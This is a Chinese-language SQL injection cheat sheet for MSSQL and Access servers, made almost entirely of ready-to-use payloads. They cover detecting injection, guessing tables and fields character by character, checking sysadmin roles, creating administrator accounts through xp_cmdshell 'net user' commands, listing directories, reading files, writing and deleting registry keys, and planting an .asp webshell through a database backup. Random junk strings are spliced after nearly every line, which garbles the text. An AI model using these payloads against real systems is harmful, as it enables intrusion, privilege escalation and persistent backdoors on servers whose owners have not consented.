1.判断是否有注入;and 1=1 ;and 1=2 /=trj5h
2.初步判断是否是mssql ;and user>0 SW;HjQ>V
!3HsI|$<G
3.注入参数是字符'and [查询条件] and ''=' Wo2v5-
&<=e_0zT
4.搜索时没过滤参数的'and [查询条件] and '%25'=' `A"Q3sf%
A:c]1
5.判断数据库系统 bpnv &EG
nFj-<!
;and (select count(*) from sysobjects)>0 mssql w^U}|h"
!^1[ s@1
;and (select count(*) from msysobjects)>0 access fwH`}<o
IwM8#6;S~
TC@bL<1
0T1ko,C!,e
6.猜数据库 ;and (select Count(*) from [数据库名])>0 *) }
:l
bHJoEYY^
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 m8u=u4z("
L^jaBl
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 3XGB+$]C
2x6<8J8v*
9.(1)猜字段的ascii值(access) ,wlbIl~
1wbTqc
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ($:y\,5(9I
0IpST
(2)猜字段的ascii值(mssql) WT?b Bf
XW^8A77H
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 0&Qsk!-B
\boL`X
10.测试权限结构(mssql) $kIo4$.Y$
vi<X3G6Xh
}/49T
?n&$m
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- /_HwifRQ
d>;2,srUf
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- hMz&JJ&B
) (+)Q'*
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- FXeV6zfrE
=Iy/cHK
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- cP,;Qbe
PlF!cr7:4
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ||`qIElAW,
VOg/VGJ
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- | yS5[?.`
?LR"hZ>
;and 1=(select IS_MEMBER('db_owner'));-- 6 1L7
-~
VkWO}
]u;GNz}?
k3C"
11.添加mssql和系统的帐户 Pf{`/UlD
u\:rY)V
;exec master.dbo.sp_addlogin username;-- tnN'V
;exec master.dbo.sp_password null,username,password;-- Tt`L(oF
yS+(<
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ^g-Fg>&M
C(xqvK~p
;exec master.dbo.xp_cmdshell 'net user username password U%h7h`=F?
70duk:Ri0
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- K q/~T7Ru
Oq[i &
;exec master.dbo.xp_cmdshell 'net user username password /add';-- \Oz,Qzr|
m';#R9\Fz
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
!8we8)7
L#`7 FaM?
C?{D"f`[]
<sO?ev[
12.(1)遍历目录 ;x,+*%
)-)ss"\+Ju
;create table dirs(paths varchar(100), id int) "$]ls9-%n
- J{Dxz
;insert dirs exec master.dbo.xp_dirtree 'c:\' {3.*7gnY\L
s c5\( b
;and (select top 1 paths from dirs)>0 tSI& "-
a5X`jo
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) W^003*m~~K
k{?!O\yY
p}96uaC1
Y+!Ouc!$
(2)遍历目录 wH+FFXGJs
g'KzdG`O0
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- >'eB2
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ZGA)r0]
P`
:jBZK=3F>
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 T!Xm")d
1]_?$)$T
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 /3OC7!~;fM
7WgIhQ~
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 n?zbUA#
(D0C#<4P
7U&5^s
)J
x(rd$oZO
13.mssql中的存储过程 S@9w'upd
iJ,M-GHK
xp_regenumvalues 注册表根键, 子键 &t~zD4u B
<9ePi9D(
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 hU 9\y
}Q!h ov
xp_regread 根键,子键,键值名 Q^*G`&w,
3w
t:5
Im
;exec xp_regread umZlIH[7
g8LT7
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 N-XVRuv
l#X=]xQf
xp_regwrite 根键,子键, 值名, 值类型, 值 "|(rVj=
aUKh})B
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 UedvA9$&;
7bA4P*
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 <Gn8B^~$
4kWg>F3
xp_regdeletevalue 根键,子键,值名 A
Z4|&iT
BO?mQu~
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ;[FW!
KYnW7|*
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Sg/:n,68
!S~,>,yd
=$^Wkau
_7r qXkp%
14.mssql的backup创建webshell Z[a O_6L
2=igS#h
use model j5PaSk&o=
}V\P,ck
create table cmd(str image); di8W2cwz
]cx"
insert into cmd(str) values (''); /d{glOk
//#xK D
backup database model to disk='c:\l.asp'; fKPiRlLS
JVD@I{
9=Y,["br$_
^t\kLU
15.mssql内置函数 A8\U
CG
@`w'
;and (select @@version)>0 获得Windows的版本号 B.]qrS|
-s9 Y(>
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 1;cv-W
r{pI-$
;and (select user_name())>0 爆当前系统的连接用户 g2+l@$W
XD;15a
;and (select db_name())>0 得到当前连接的数据库 zkjPLeX
hknwis%y
fl} rz
skk-.9
16.简洁的webshell 6'RZ
)m|X;eEo
use model * \=2KIF'
/W"Bf
create table cmd(str image); s5c! ^,L8
(Wm/$P;
insert into cmd(str) values (''); d%}crM-KTL
D}zOuB,S
backup database model to disk='g:\wwwtest\l.asp';